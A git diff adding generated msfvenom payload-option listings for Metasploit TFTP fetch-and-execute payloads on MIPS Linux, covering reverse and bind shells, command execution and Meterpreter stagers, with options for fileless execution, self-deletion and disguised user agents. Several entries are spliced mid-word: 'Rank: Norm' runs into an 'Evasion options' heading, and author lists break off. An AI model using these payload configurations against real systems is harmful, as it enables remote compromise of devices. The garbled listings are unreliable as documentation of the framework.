MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..5c78a01 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt @@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MdRBdoFC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..f4e4e34 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iIlayMFxi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..3610ba2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EdHkCdfGd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt new file mode 100644 index 0000000..2dd18b3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt @@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pkFFSgBQoQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b64695b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Norm +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PHKBDTDUB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..87f09d7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FugHyIMduJtv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..3654a36 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DMzxhxFBSxJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..8c8df63 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes 